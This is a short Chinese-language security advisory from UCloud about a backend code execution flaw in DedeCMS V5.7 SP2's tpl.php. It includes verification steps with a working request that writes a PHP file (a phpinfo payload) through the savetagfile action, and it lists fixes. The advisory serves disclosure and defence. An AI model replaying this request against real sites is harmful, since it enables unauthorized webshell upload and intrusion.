UCloud-201803-002:DedeCMS V5.7 SP2后台存在代码执行漏洞安全预警
- 发布时间 2018-03-08
- 更新时间 2018-03-08
- 漏洞等级 High
- CVE编号 NA
漏洞详情
DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞,攻击者可利用该漏洞在增加新的标签中上传木马,获取webshell。由于织梦后台dede/tpl.php中的content变量和filename变量客户端可控,且服务端未对此参数合法性进行校验,导致攻击者可以通过修改请求参数的方法上传木马程序。
影响范围
DedeCMS V5.7 SP2
验证方法
1.首先获取token:访问 “域名 + /dede/tpl.php?action=upload” 在页面源代码中获取到token值;
2.然后访问“域名 + /dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=[token值]"
3.访问”域名 + /include/taglib/moonsec.lib.php“,如果可以查看到php信息页面表示受影响
修复方案
1、使用UEWAF进行安全防御;
2、厂商发布修复版本后进行升级更新;
3、修改处理逻辑,禁止写入文件、过滤恶意标签;
